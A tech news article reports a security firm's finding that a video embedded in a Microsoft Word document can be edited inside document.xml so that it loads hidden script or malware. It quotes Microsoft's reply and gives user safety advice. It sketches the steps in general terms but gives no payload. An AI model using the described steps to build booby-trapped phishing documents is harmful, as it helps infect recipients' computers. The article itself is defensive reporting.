Watch Out! Embedded Microsoft Word Videos Could Infect Your PC

There seems to be a serious security flaw in Microsoft Word that Microsoft doesn't want to fix.

Credit: Pathdoc/Shutterstock

(Image credit: Pathdoc/Shutterstock)

In a blog post yesterday (Oct. 25), Israeli security firm Cymulate shows how you can alter the code of a video embedded in a Word document to load malware instead of the video.

"Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden HTML/JavaScript code that will be running in the background and could potentially lead to further code execution scenarios," Cymulate Chief Technology Officer Avihai Ben-Yossef said in the company blog post.

In other words, phishers and scammers could abuse this flaw to attach booby-trapped Word documents, disguised as invoices or resumes, to hapless email recipients.

We reached out to Microsoft for comment and received this statement attributed to Jeff Jones, a senior director at Microsoft: "The product is properly interpreting html as designed — working in the same manner as similar products."

That may be accurate, but we're not sure if it helps. In the meantime, you can protect yourself by not clicking on any video file embedded in a Word document you didn't expect to receive. A good antivirus program might also be able to detect and stop the malware if you do end up clicking the video link.

MORE: Best Antivirus Software and Apps

The issue partly exists because modern Word documents, or ".docx" files, are written in XML, a text-markup language similar to the HTML markup language used to create web pages.

Like web pages, Word documents can have supporting files that store the data needed to present the finished document — and a .docx file is a really just a compressed bundle of all those files.

Here's a fun thing to do. Find a .docx file on your machine you don't really need anymore. Right-click its name and change the extension from ".docx" to ".zip". Hit Enter to save the change, then right-click the file again and select "Extract All".

Windows will extract all the files in the Word document to a new folder, which will contain more folders with name such as "_rels", "word" and "theme" as well as files named "document.xml", "fontTable.xml", "settings.xml" and so on. (Some of these files may be in the "word" folder.)

The "document.xml" file is the one that matters. Open that in a text editor such as Notepad and you'll see a whole lot of gibberish, with the actual text of the Word document barely discernible. But that gibberish is XML markup language, which determines how the text is presented.

If you have a web-based video, such as one from YouTube, embedded in the Word document, the URL, or web address, of the video will appear in the document.xml file.

The thing is, Word documents aren't locked in general. After all, it's your file. So, Cymulate says, you can go into the document.xml file, change the code relating to the embedded video to point to something malicious, such as an online malware repository that will download nasty stuff to a computer. Then save the document.xml file, rebundle all the files into a .docx file and send it on its way.

This procedure didn't quite work for us when we tried to redirect an innocuous YouTube video in our own Word file, so we'll just have to trust Cymulate about this part.

And because Microsoft doesn't seem to have a solution in mind, we'll have to go with the advice the company's spokesman gave us: "We encourage customers to practice good computing habits online, including exercising caution when clicking on links or opening unknown files."

Paul Wagenseil

Paul Wagenseil is a senior editor at Tom's Guide focused on security and privacy. He has also been a dishwasher, fry cook, long-haul driver, code monkey and video editor. He's been rooting around in the information-security space for more than 15 years at, SecurityNewsDaily, TechNewsDaily and Tom's Guide, has presented talks at the ShmooCon, DerbyCon and BSides Las Vegas hacker conferences, shown up in random TV news spots and even moderated a panel discussion at the CEDIA home-technology conference. You can follow his rants on Twitter at @snd_wagenseil.